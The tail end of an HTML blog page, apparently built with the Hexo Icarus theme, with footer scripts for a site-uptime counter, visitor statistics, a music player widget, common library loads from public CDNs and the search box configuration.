                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>